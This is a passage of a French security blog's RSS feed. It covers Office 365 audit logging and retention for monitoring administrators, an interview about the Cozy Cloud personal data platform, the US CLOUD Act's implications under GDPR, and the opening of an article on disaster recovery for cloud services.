<ul style="text-align: justify;">
<li><em>Modification d’un rôle d’administration : AddMembertoRole</em></li>
<li><em>Ajout d’une application :</em> <em>CoreDirectory &#8211;</em> <em>ApplicationManagement &#8211; Add service principal / Add application </em></li>
<li><em>Consentement à une application : Core Directory &#8211; ApplicationManagement / Add delegated permission grant / Consent to application (ConsentContext.IsAdminConsent)</em></li>
</ul>
<p style="text-align: justify;"><em> </em></p>
<figure id="post-12795 media-12795" class="align-none" style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-12795 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image4.png" alt="" width="1924" height="906" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image4.png 1924w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image4-406x191.png 406w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image4-71x33.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image4-768x362.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image4-1536x723.png 1536w" sizes="auto, (max-width: 1924px) 100vw, 1924px" /></figure>
<p style="text-align: center;"><em>Figure 2 &#8211; Récapitulatif des caractéristiques des logs d&rsquo;Office 365</em></p>
<p>&nbsp;</p>
<p style="text-align: justify;">En résumé, les Unified Audit Logs apportent une vision consolidée des différents services d’Office 365, mais certaines informations peuvent être manquantes. Il sera nécessaire de s’assurer que les journaux requis soient bien présents, et ensuite d’approfondir une investigation dans les logs et les rapports d’Exchange ou Azure.</p>
<p>&nbsp;</p>
<h2 style="text-align: justify;">Quelle rétention pour les différents journaux d’Office 365 ?</h2>
<p style="text-align: justify;">Une fois les logs adéquats identifiés, se pose le défi de la rétention. Comment être sûr que les journaux sont bien conservés sans être altérés, pendant toute la durée requise par la politique de sécurité de l’entreprise et les différentes réglementations, comme la loi anti-terroriste ou le RGPD ?</p>
<p style="text-align: justify;">Par construction, et contrairement aux solutions Exchange and SharePoint on-premise, <strong>tous les logs cités précédemment sont inaltérables</strong> – c’est-à-dire non modifiables ni supprimables par les administrateurs de l’entreprise. Par ailleurs, les <strong>durées de conservation définies par défaut ne peuvent être modifiées </strong>(à savoir 90 jours pour les logs Office 365 et 7 ou 30 jours pour les logs Azure avec des licences standards). <strong>Ceci à une exception près, un administrateur Exchange a la possibilité d’effacer les journaux </strong>des boîtes aux lettres, en modifiant la durée de rétention associée.</p>
<p style="text-align: justify;"><em>Si on reprend nos exemples, on pourrait tout à fait imaginer un administrateur malveillant se donnant des droits pour accéder à une boîte mail, puis regarder les mails et effacer les logs d’accès en fixant une durée de rétention nulle. Dans ce cas, ne serait conservée que l’élévation de privilège réalisée dans les Administrator Audit Logs. </em></p>
<p style="text-align: justify;"><strong>Afin de se mettre en conformité avec les exigences de sécurité ou la réglementation</strong>, il pourra de plus être nécessaire de s’assurer que les journaux des différents services soient <strong>conservés plus de 7, 30 ou 90 jours</strong>.</p>
<p style="text-align: justify;"><em> </em></p>
<h2 style="text-align: justify;">Quelques étapes pour implémenter une journalisation pertinente au sein d’Office 365</h2>
<ol style="text-align: justify;">
<li><strong>Définition et activation des logs nécessaires</strong>: les Unified Audit Logs peuvent ne pas être suffisants (suivi des API Office 365 et Azure AD, journalisation des accès des administrateurs aux boîtes aux lettres, etc.)</li>
<li><strong>Configuration d’un export automatique des journaux </strong>identifiés vers un stockage externe  (via PowerShell ou les API Management) ;</li>
<li><strong>Suivi de l’état du tenant </strong>: implémentation d’un tableau de bord des paramètres du tenant configuration d’alertes liées à un changement de la configuration des journaux (via le Centre de Sécurité ou Conformité, les API Office 365 Management ou PowerShell), comme la désactivation des Unified logs ou à une modification de la rétention des logs d’une boîte aux lettres ;</li>
</ol>
<p>&nbsp;</p>
<figure id="post-12793 media-12793" class="align-none" style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-12793 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image2.png" alt="" width="1648" height="254" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image2.png 1648w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image2-437x67.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image2-71x11.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image2-768x118.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2020/03/Image2-1536x237.png 1536w" sizes="auto, (max-width: 1648px) 100vw, 1648px" /></figure>
<p style="text-align: center;"><em>Figure 3 – Bonnes pratiques pour la journalisation du tenant</em></p>
<p>&nbsp;</p>
<p style="text-align: justify;">Après avoir réalisés ces trois actions, l’entreprise aura les <strong>informations nécessaires pour auditer les actions d’utilisation et d’administration du tenant</strong>. Cependant, elles ne répondent pas encore au besoin plus large de supervision des administrateurs. Il pourra être utile de mettre en place des alertes (via le Centre de Sécurité ou de Conformité ou des outils tierces spécialisés).</p>
<ol>
<li><strong>(Pour aller plus loin) Mise en place d’une supervision basique </strong>: définition de scénarii de détection sécurité généralistes, identification des logs concernés, activation de l’alerte associée dans les Centres de Sécurité ou de Conformité ;</li>
<li><strong>(Pour aller encore plus loin) Mise en place d’une supervision avancée </strong>: identification de scénarii liés à un contexte métier, implémentation, définition de la gouvernance associée, amélioration continue.</li>
</ol>
<p style="text-align: justify;">Quels outils utiliser pour analyser les journaux ? Quels scénarios de détection prioriser ? Quelle gouvernance mettre en place pour définir, implémenter et suivre des alertes ? Autant de questions qui doivent être traitées dans l’implémentation de la supervision de la plateforme de collaboration.</p>
<p style="text-align: justify;">Il faudra également prendre en compte les changements réguliers apportés par Microsoft sur ces services, ainsi que sur la structure des logs et des API. D’autant plus que cohabitent les fonctionnalités en P<em>review </em>et celles en <em>General Availability</em>.</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2020/03/journalisation-doffice-365-un-cas-concret-avec-les-administrateurs/">Journalisation d’Office 365 : un cas concret avec les administrateurs</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Vie Privée à l’ère du Numérique – Interview de Benjamin ANDRE (Cozy Cloud)</title>
		<link>https://www.riskinsight-wavestone.com/2019/11/interview-benjamin-andre-cozy-cloud/</link>
		
		<dc:creator><![CDATA[Raphaël Brun]]></dc:creator>
		<pubDate>Wed, 27 Nov 2019 13:03:37 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Digital Compliance]]></category>
		<category><![CDATA[B2B2C]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Digital privacy]]></category>
		<category><![CDATA[interview]]></category>
		<category><![CDATA[vie privée]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=12223</guid>

					<description><![CDATA[<p>Dans le cadre de  l’étude « Vie privée à l’ère du numérique : du big data au smart data » publiée par Wavestone en mai dernier, une interview de Benjamin André, co-fondateur et CEO de Cozy Cloud, a été réalisée afin de mettre en...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/11/interview-benjamin-andre-cozy-cloud/">Vie Privée à l’ère du Numérique – Interview de Benjamin ANDRE (Cozy Cloud)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Dans le cadre de  l’étude « Vie privée à l’ère du numérique : du big data au smart data » <a href="https://www.wavestone.com/fr/insight/vie-privee-numerique/">publiée</a> par Wavestone en mai dernier, une interview de Benjamin André, co-fondateur et CEO de Cozy Cloud, a été réalisée afin de mettre en lumière les innovations proposant des alternatives à la collecte massive de données. Retour sur cette interview.</em></p>
<p>&nbsp;</p>
<h2>Ressentez-vous une préoccupation des citoyens concernant leur vie privée ?</h2>
<p>Ce n’est pas vraiment une préoccupation à ce stade, sauf pour une minorité, environ 5 à 10% de la population d’après certains sondages. Cette minorité comprend la manipulation commerciale dont elle est l’objet et, conséquemment, le poids du ciblage dans son comportement. Le constat intéressant est qu’aujourd’hui ce ne sont plus spécifiquement les « geeks » qui prennent conscience de cette manipulation, mais des profils de plus en plus variés. Cela se traduit pour la grande majorité par un agacement de la population, parfois même une exaspération liée à la sensation d’être un produit. La puissance des géants devient dérangeante, les big tech sont en train de devenir les méchants.</p>
<p><strong> </strong></p>
<h2>Comment cette évolution se traduit-elle depuis l’entrée en vigueur du RGPD ?</h2>
<p>Je ressens une meilleure compréhension des enjeux de protection de la vie privée, notamment lorsque je donne mon pitch. Je pense que les réactions que je récolte sont un bon échantillonnage de l’ère du moment. Il y a 4 ans, je passais parfois pour un fou : « la confidentialité, ça n’intéresse personne », « le modèle GAFA c’est le seul qui fonctionne pour internet », etc. Aujourd’hui, ce n’est plus du tout le cas : c’est un marqueur énorme, très tangible.</p>
<p><strong> </strong></p>
<h2>Que propose Cozy Cloud pour les aider ?</h2>
<p>Aujourd’hui, nos données ne sont déjà pas sous notre contrôle, mais elles sont également dispersées. Ainsi, l’usage que l’on peut en tirer est limité, voire freiné. La vie numérique se fragmente du fait de sa diversification : vie scolaire, parcours de santé, interactions avec les pouvoirs publics, objets connectés, etc. Toutes ces données circulent dans des écosystèmes étanches les uns par rapport aux autres, et cela crée une friction : c’est l’enfer des mots de passe, téléchargements, synchronisations, back-ups, etc. De ce fait, la force d’Apple consiste à créer une intégration, un maillage entre toutes ces données : l’utilisateur reçoit une invitation dans ses mails, elle est ajoutée sur son agenda, qui se synchronise avec son smartphone, lequel conduira bientôt sa voiture à destination… En interconnectant toutes ces données, Apple est devenue l’une des premières valeurs boursières !</p>
<p>Le fait d’ôter de la friction entre ces écosystèmes étanches et d’ajouter de la simplicité aux usages numériques a donc une valeur énorme. Une barrière persiste : l’isolation des données les unes par rapport aux autres. Pour un numérique utile, pratique, commode et personnalisé, il faut réunir les données.</p>
<p>En Europe, le système politique donne à l’individu une place centrale : aujourd’hui, grâce au RGPD, l’individu dispose d’un droit à la portabilité. C’est un droit fort pour l’usager, ainsi qu’un véritable levier pour Cozy Cloud et pour tous ceux qui se veulent des tiers de confiance. Il ne s’agit pas d’un droit de téléchargement, mais véritablement d’un droit au transfert pour l’utilisateur. Ce droit modifie totalement les règles du jeu.</p>
<p>Grâce à ce droit, l’individu est rendu légitime pour réconcilier les données : il dispose, d’une part des logins et mots de passe, d’autre part de la légitimité légale. En appuyant Cozy Cloud sur cette double légitimité, nous offrons à l’individu une plateforme numérique personnelle, dont il garde le contrôle, et dans laquelle il peut centraliser toutes ses données et accéder à de nouveaux services numériques.</p>
<p><strong> </strong></p>
<h2>Concrètement, quels services proposez-vous aux individus ?</h2>
<p>Cozy Cloud, ce n’est pas seulement un coffre-fort « statique » comme on en voit beaucoup. L’utilisateur centralise ses données sur un cloud personnel pour pouvoir y adosser ses services, rajouter des usages et effectuer des croisements entre ses données. Nous appelons cela du « <em>transverse data</em> » : croiser les données issues de sources diverses. L’utilisateur peut par exemple faire le lien entre sa facture d’électricité et un débit sur son compte en banque : nous créons ainsi une véritable fluidité.</p>
<p>De plus, la plateforme permet à l’utilisateur de communiquer avec ses divers fournisseurs, qui se trouvent aujourd’hui dans des univers séparés : désormais, un login et un mot de passe uniques permettent d’échanger avec les différents fournisseurs.</p>
<p>Enfin, la solution permet la mise en place de services numériques à domicile. A l’heure actuelle, il faut laisser collecter la donnée pour pouvoir bénéficier d’un service ; par exemple, EDF envoie chaque mois des centaines de prélèvements automatiques sans savoir lesquels vont être bloqués in fine. L’information qui permettrait d’anticiper ces prélèvements infructueux existe mais EDF ne peut y accéder car cela reviendrait à accéder aux soldes bancaires de ses clients. Cela représente un coût important en frais de gestion, de traitement, de suivi et provoque des frictions dans la relation client. Avec la solution de Cozy Cloud, l’utilisateur récupère et consolide dans sa plateforme ses données bancaires, sa facture et la date de son prochain prélèvement ; de son côté, Cozy Cloud développe un protocole permettant de faire des calculs sur les données présentes dans la plateforme. Ainsi, l’algorithme d’EDF, qui a accès à la donnée mais ne la collecte pas, peut prédire que le prélèvement va être bloqué. De son côté, la banque peut par exemple faire une offre commerciale, et différer le prélèvement. Cette offre se base sur l’accès à une donnée très personnelle, qui relève de notre intimité numérique. Pourtant, jamais EDF ne reçoit la donnée : celle-ci ne sort pas du coffre numérique de l’individu et n’est donc pas dévoilée.</p>
<p><strong> </strong></p>
<h2>Comment sont gérés les accès et habilitations dans Cozy Cloud ?</h2>
<p>C’est un peu similaire à ce que l’on peut retrouver sur nos smartphones : une fenêtre pop-up s’ouvre, par exemple pour demander l’accès à notre liste de contacts. L’accès d’une application à nos données facilite alors de nombreuses actions, par exemple la saisie d’un mail en local. Mais le transfert de données vers l’extérieur pose un véritable problème.</p>
<p>La fenêtre pop-up de Cozy Cloud propose deux options à l’usager : soit un usage local, soit un usage partagé de la donnée.</p>
<p>&nbsp;</p>
<h2>Quel est l’apport de votre solution pour les organisations ?</h2>
<p>Cozy Cloud se fonde sur deux business models successifs.</p>
<p>Tout d’abord, nos clients ce sont de grands comptes, les <em>« brick and mortars »</em>, qui bénéficient d’une confiance historique, menacés par les puissances du numérique. Ils veulent se repositionner à l’ère du numérique et valoriser cet asset de confiance : c’est donc du B2B2C. Cozy Cloud est aux <em>« brick and mortars »</em> ce qu’est Android pour le serveur, soit un service valorisant un hardware.</p>
<p>Le second business model interviendra une fois que la plateforme conciliera plusieurs acteurs-clés, tels que les banques ou les opérateurs de télécommunications : Cozy Cloud pourra s’adresser à une partie significative de la population. Il deviendra alors opérateur d’interactions digitales, dans une logique de partage de revenu avec les différents clients. En effet, Cozy Cloud gère l’écosystème et les contrats : lorsqu’un <em>« brick and mortar »</em> signe un contrat, tous les clients de Cozy peuvent bénéficier de sa donnée, avec l’accord de l’utilisateur. Le revenu lié à un client en particulier est matérialisé par la donnée apportée et la commission payée à Cozy Cloud.</p>
<p>&nbsp;</p>
<h2>Plus concrètement, quelle valeur ajoutée leur proposez-vous ?</h2>
<p>On peut valoriser la donnée sans la monétiser pour autant : ce qui a de la valeur, ce n’est pas la donnée en tant que telle, c’est plutôt l’interaction créée entre les données, lorsque celle-ci est pertinente. Les organisations doivent le comprendre. Nous nous positionnons comme un opérateur d’interactions digitales.</p>
<p>Par exemple, lorsqu’un utilisateur achète une télévision à la Fnac, il reçoit la facture dans son cloud personnel ; ainsi son assurance peut lui communiquer des informations utiles, de type « votre nouvelle télé est bien assurée pour le dégât des eaux ». Cette interaction crée de la valeur pour l’assuré, mais également pour l’assureur. Dans ce contexte, l’organisation valorise son rôle de tiers de confiance en offrant davantage de services, mais peut également développer un nouveau métier. Celui-ci consiste, non plus à sécuriser de la donnée, mais à créer un écosystème de services à valeur ajoutée pour l’entreprise, mais aussi utile pour l’utilisateur. Si nous reprenons l’exemple d’EDF et de la banque, l’interaction rendue possible par Cozy Cloud engendre pour EDF un gain d’argent et de temps, qui se monétise. La plateforme Cozy devient ainsi un opérateur d’interactions digitales, somme toute plus intelligentes, tout en restant sous le contrôle des particuliers.</p>
<p>Cette solution pourrait sembler aller à l’encontre de technologies telles que le big data ou le machine learning de prime abord ; en réalité, jamais les entreprises n’auraient pu collecter de telles données et les ajouter à leur base de données. Cela leur permet de ne pas être définitivement désintermédiées, mais au contraire d’accéder à davantage de données.</p>
<p>&nbsp;</p>
<h2>Cela ne paraît pas nécessairement évident au premier abord : comment les convaincre ?</h2>
<p>Il ne s’agit définitivement pas de convaincre les 30 000 PME et grands groupes français. Notre solution s’adresse à des acteurs qui sont aujourd’hui challengés par les nouveaux entrants du numérique. Aujourd’hui, le constat est sans équivoque : les GAFA connaissent mieux les clients des « <em>brick and mortars</em> » que les « <em>brick and mortars</em> » ne les connaissent eux-mêmes. Quand Facebook dépose un brevet sur l’évaluation de risque de crédit bancaire, ce n’est pas parce que Facebook est devenu un banquier : c’est simplement que Facebook a compris qu’il connaissait mieux les clients des banques que les banques elles-mêmes. Et ainsi, Facebook peut devenir banquier, tout comme il peut devenir opérateur d’énergie, de mobilité, de médias, etc. Du fait de l’intimité numérique qu’entretiennent les GAFA avec leurs usagers, ils s’approprient progressivement des verticales métiers.</p>
<p>En revanche, les « <em>brick and mortars</em> » bénéficient d’une confiance historique : banques, télécommunications, assurances mutualistes, pouvoir publics, etc. Nos clients sont des grands comptes, menacés par les puissances du net, qui veulent se repositionner à l’ère du numérique et valoriser cet asset qu’est la confiance. Nous leur proposons de tenir cette position de tiers de confiance, mais également de tirer de nouveaux usages de cette capacité de stockage.</p>
<p>Dans un premier temps, les organisations peuvent avoir la fausse impression de se faire prendre leurs données. Dans la réalité, Cozy Cloud vient les aider à développer des outils et usages plus intelligents. Soit ces organisations ouvrent le pas, et c’est une bonne chose pour elle, soit c’est Google qui le fera…</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2019/11/interview-benjamin-andre-cozy-cloud/">Vie Privée à l’ère du Numérique – Interview de Benjamin ANDRE (Cozy Cloud)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>CLOUD Act : vos données sont-elles mieux protégées ?</title>
		<link>https://www.riskinsight-wavestone.com/2018/04/cloud-act/</link>
		
		<dc:creator><![CDATA[Etienne Lafore]]></dc:creator>
		<pubDate>Wed, 18 Apr 2018 11:00:09 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[confiance numérique]]></category>
		<category><![CDATA[data protection]]></category>
		<category><![CDATA[DPO]]></category>
		<category><![CDATA[e-privacy]]></category>
		<category><![CDATA[protection des données]]></category>
		<category><![CDATA[Règlementation]]></category>
		<category><![CDATA[RGPD]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=10677/</guid>

					<description><![CDATA[<p>Après plusieurs tentatives d&#8217;adoption de lois facilitant la saisie de données de clients de services américains stockées en dehors des États-Unis, le Congrès américain a adopté en mars 2018 le « Clarifying Lawful Overseas Use of Data Act » ou CLOUD Act,...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2018/04/cloud-act/">CLOUD Act : vos données sont-elles mieux protégées ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Après plusieurs tentatives d&rsquo;adoption de lois facilitant la saisie de données de clients de services américains stockées en dehors des États-Unis, le Congrès américain a adopté en mars 2018 le « <strong>Clarifying Lawful Overseas Use of Data Act </strong>» ou CLOUD Act, qui fournit un cadre légal pour l&rsquo;accès aux données de fournisseurs américains, en dehors de leur domaine de juridiction.</em></p>
<p>&nbsp;</p>
<p>Le projet de loi, créé à la base pour modifier un projet de loi de 1986, le «Stored Communication Act», permet aux États-Unis de forcer les fournisseurs de services américains  à transmettre les données de leurs clients stockées à l’étranger de manière beaucoup plus rapide. Il faut en moyenne dix mois pour obtenir les données, une durée improductive pour les enquêtes menées par les États-Unis. Le projet de loi vise à permettre aux autorités américaines (du shérif à la CIA) à accéder à <strong>des données hébergées par des entreprises américaines sans passage devant un juge</strong>. <strong>Les grandes entreprises technologiques</strong>, qui ont soutenu le projet de loi devant le Sénat, <strong>pourront s&rsquo;opposer à une demande si</strong> :</p>
<ul>
<li>Le client ou l&rsquo;abonné n&rsquo;est pas américain ou ne réside pas aux États-Unis <em>(</em><a href="https://www.congress.gov/bill/115th-congress/senate-bill/2383/text">section 3.2.b.h.2.i</a><em>), </em><strong><u>et</u></strong></li>
<li>Le transfert obligerait le fournisseur à enfreindre les réglementations du pays hébergeant les données (<a href="https://www.congress.gov/bill/115th-congress/senate-bill/2383/text">section 3.2.b.h.2.ii</a>)</li>
</ul>
<p>Cette demande sera alors portée devant un tribunal américain qui pourra alors casser ou non la demande de transfert de données. Sa décision sera basée, entre autres, sur la validité des informations apportées, de l’intérêt de la requête pour les Etats-Unis et de l’envergure et les chances d’application de la violation de loi dans le pays étranger. Le caractère public du recours n’est pas précisé, en particulier la capacité des entreprises à communiquer sur ces contestations. Aujourd’hui, il nous parait probable que les grands acteurs américains utilisent ce recours pour garder la confiance de leurs clients.</p>
<p>Afin d’éviter d’enfreindre les réglementations des pays concernés,<strong> les États-Unis pourront passer des accords bilatéraux avec ces États</strong>, qui, en échange de leur bonne volonté, pourront accéder aux données sur le territoire américain.</p>
<p>Aux États-Unis, le CLOUD Act reste contesté pour les risques hérités par les potentiels accords avec les pays étrangers. Le fait que le pouvoir exécutif soit à même de mettre en place les accords mutuels inquiète la population américaine, qui craint que des puissances étrangères se servent du Cloud Act pour aller fouiller dans leurs données sans garde-fou.</p>
<p>&nbsp;</p>
<h2>Quelles conséquences pour les clients européens ?</h2>
<p>Alors que les géants de la technologie (Facebook, Google, Microsoft, Apple) ont soutenu le projet de loi (les autorités américaines s&rsquo;abstenant de les approcher pour un accès backdoor et fournissant un cadre clair pour exercer le transfert de données), <strong>ces réglementations peuvent être inquiétantes pour la privacy des clients </strong>des entreprises ciblés. Cette loi pourrait laisser les clients sans droit de regard, ni information sur l’accès à leurs données par les autorités américaines.</p>
<p>Cependant, les clients européens dont les données sont traitées en Europe pourraient être bientôt protégés par le Règlement Général sur la Protection des Données (RGPD). Les articles 45 et 48 du règlement qui entrera bientôt en vigueur définissent un ensemble de règles claires pour permettre le transfert vers des pays tiers. Selon Frank Jennings (avocat de renom sur les sujets cloud), l’European Data Protection Board, en charge de l’implémentation du RGPD, <a href="https://www.theregister.co.uk/2018/04/03/us_government_serves_microsoft_with_fresh_warrant_for_irishheld_emails/">sera en charge de décider</a> si les saisies dans le cadre du CLOUD Act constituent une mesure nécessaire à la sauvegarde de la sécurité nationale américaine, ou si la demande ne respecte pas la nouvelle réglementation.  <strong>Cela pourrait obliger les États-Unis à négocier avec l&rsquo;UE ou ses États membres les conditions de tels transferts, et donc à protéger leurs citoyens contre les transferts illégitimes</strong>. Les clients américains resteraient toutefois sous la portée du CLOUD Act.</p>
<p>Des négociations doivent commencer entre la Commission européenne et les Etats-Unis. Les dirigeants de l&rsquo;UE ont déjà critiqué le projet de loi américain pour son adoption précipitée, ce qui risque de compliquer les négociations. Entre-temps, <a href="https://www.eff.org/deeplinks/2018/03/nearly-100-public-interest-organizations-urge-council-europe-ensure-high">une centaine d&rsquo;organisations de la société civile</a> ont pressé le Conseil de l&rsquo;Europe à rendre publiques les négociations prévues lors de la « Convention sur la cybercriminalité » (ou « Convention de Budapest »).</p>
<p>&nbsp;</p>
<h2>Les lois de confidentialité, un atout pour les entreprises ?</h2>
<p>Alors que le RGPD a pu préoccuper une bonne partie des entreprises sur le changement que cela impliquerait pour leurs systèmes d&rsquo;information <a href="https://www.riskinsight-wavestone.com/2018/03/e-privacy-urgent-attendre/">et que la directive « E-Privacy » se prépare</a>, il pourrait être intéressant de voir le rapport à la réglementation évoluer dans le monde des affaires. Les lois de «data privacy » pourraient, dans un futur proche ou lointain, <strong>être considérées comme une aide à la protection de leurs données et </strong><a href="https://www.riskinsight-wavestone.com/2017/01/vie-privee-ere-numerique/"><strong>au maintien de la confiance</strong></a><strong> des clients</strong>.</p>
<p>Dans un monde où les questions de confidentialité des données deviennent de plus en plus importantes (<a href="http://www.lemonde.fr/pixels/article/2018/03/22/ce-qu-il-faut-savoir-sur-cambridge-analytica-la-societe-au-c-ur-du-scandale-facebook_5274804_4408996.html">Cambridge Analytica</a>, <a href="https://www.cnet.com/news/google-dumps-home-minis-top-touch-function-over-privacy/">Google Home Mini</a>), les protections sur les données des clients peuvent être un argument décisif lors du choix entre des offres compétitives. Le positionnement des fournisseurs américains sur les questions de Privacy et de protection des données est attendu impatiemment.</p>
<p>&nbsp;</p>
<h2>Que faire aujourd&rsquo;hui ?</h2>
<p>Pour conclure, les nouvelles réglementations sur la privacy restent assez ambiguës et peuvent même se heurter sur certains points. La principale conclusion reste que <strong>les Européens devraient être mieux protégés par le RGPD face au CLOUD Act</strong>, si les fournisseurs américains dénoncent les requêtes abusives et que les tribunaux en charge de valider la demande jouent leurs rôles. Les clients non européens, quant à eux, ne seraient pas plus protégés en hébergeant leurs données en Europe.</p>
<p>En attendant l’entrée en vigueur de nouvelles lois traitant de la confidentialité et les éventuelles saisies des données, vous pouvez prendre des mesures pour protéger vos données personnelles et commerciales contre les écoutes d’outre-mer et autres menaces potentielles :</p>
<ol>
<li>Clarifier avec votre fournisseur <strong>dans quelles conditions il pourrait être amené à donner accès à vos données, </strong>sans oublier de prendre en compte les traités d’assistance judiciaire mutuelle (Mutual Legal Assistance Treaties).</li>
<li><strong>Définir ou revoir votre stratégie d’hébergement</strong> suivant le type de données, la nationalité du fournisseur et la location de l’hébergement</li>
<li><strong>Privilégier l’hébergement de données dans des datacenters européens</strong> ou dans des pays disposant de règles bien établies en matière de confidentialité des données.</li>
<li><strong>Choisir un fournisseur français ou européen permet d’éviter les risques du CLOUD Act</strong>. En contractualisant qu’il n’utilise pas de sous-traitants américains (directement ou indirectement) !</li>
</ol>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2018/04/cloud-act/">CLOUD Act : vos données sont-elles mieux protégées ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Le Cloud, la fin ou renouveau du secours informatique ?</title>
		<link>https://www.riskinsight-wavestone.com/2017/08/le-cloud-la-fin-ou-renouveau-du-secours-informatique/</link>
		
		<dc:creator><![CDATA[Etienne Lafore]]></dc:creator>
		<pubDate>Thu, 17 Aug 2017 17:36:50 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[AWS]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[IaaS]]></category>
		<category><![CDATA[PaaS]]></category>
		<category><![CDATA[PCA]]></category>
		<category><![CDATA[PCI]]></category>
		<category><![CDATA[PRA]]></category>
		<category><![CDATA[PSI]]></category>
		<category><![CDATA[SaaS]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=9954/</guid>

					<description><![CDATA[<p>Les entreprises ont de plus en plus recours aux services cloud (SaaS, PaaS, IaaS) pour leur environnement informatique. Ils apportent plus de flexibilité avec des coûts pouvant être plus avantageux qu’une infrastructure classique. En 2016, en France, 48% des entreprises...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2017/08/le-cloud-la-fin-ou-renouveau-du-secours-informatique/">Le Cloud, la fin ou renouveau du secours informatique ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Les entreprises ont de plus en plus recours aux services cloud (SaaS, PaaS, IaaS) pour leur environnement informatique. Ils apportent plus de flexibilité avec des coûts pouvant être plus avantageux qu’une infrastructure classique. <a href="https://www.insee.fr/fr/statistiques/2672067">En 2016, en France, 48% des entreprises de plus 250 personnes y avaient recours soit une augmentation de 12 points par rapport à 2014.</a> La plus grande disponibilité des infrastructures Cloud est souvent identifiée comme une opportunité. Néanmoins, le risque de défaillance d’un datacenter du fournisseur n’est que rarement traité, alors que ses services reposent sur des datacenters bien physiques et non pas sur des nuages. Ces datacenters font face aux mêmes menaces que les « datacenters traditionnels » : catastrophes naturelles, erreurs humaines… Il est donc nécessaire de se demander comment assurer le secours informatique de ces infrastructures Cloud.</em></p>
<h2>Le secours informatique SaaS, une responsabilité du fournisseur à formaliser</h2>
<p>Un service SaaS (<em>Software as a Service</em>) est un logiciel mis à disposition et directement consommable depuis Internet. Il est géré et administré par un ou plusieurs fournisseurs.  Le client n’a donc pas la latitude nécessaire pour opérer le secours (pas d’accès aux données brutes, pas d’accès aux codes sources, ni aux applicatifs pour dupliquer l’infrastructure…), il doit donc s’en remettre au bon vouloir de son fournisseur.</p>
<h3>Un niveau de couverture du secours informatique pour SaaS variable suivant la maturité du fournisseur</h3>
<p>Trois grandes tendances se dessinent :</p>
<ul>
<li><strong>Les fournisseurs qui disposent d’un plan de secours informatique inclus<br />
</strong>Dans le cadre de l’offre standard, le fournisseur assure un secours sur un datacenter distant, complété généralement par des sauvegardes externalisées. Il ne s’engage néanmoins que rarement sur les délais de reprise.<br />
<em><em>Ex : les grands acteurs du SaaS (ex : Office 365, SalesForce, SAP…) , ainsi que certains acteurs de taille intermédiaire (ex : Evernote, Xero…) ;</em></em></li>
</ul>
<ul>
<li><strong>Les fournisseurs qui disposent simplement d’une sauvegarde externalisée<br />
</strong>En tant que tel, aucun plan de secours informatique n’est clairement établi. Le client doit alors s’interroger sur la capacité du fournisseur à restaurer les sauvegardes en cas de sinistre global sur le site principal.<br />
<em>Ex : Des fournisseurs de taille intermédiaire (ex : Zervant, Sellsy…) ;</em></li>
</ul>
<ul>
<li><strong>Les fournisseurs qui ne communiquent pas ou n’en disposent pas<br />
</strong>Le sujet du secours informatique n’est pas abordé, il est donc préférable de considérer que rien n’est fait.<br />
<em>Ex : Les acteurs de petite taille sont généralement dans ce cas.</em></li>
</ul>
<h3>L&rsquo;importance de l&rsquo;aspect contractuel<strong><br />
</strong></h3>
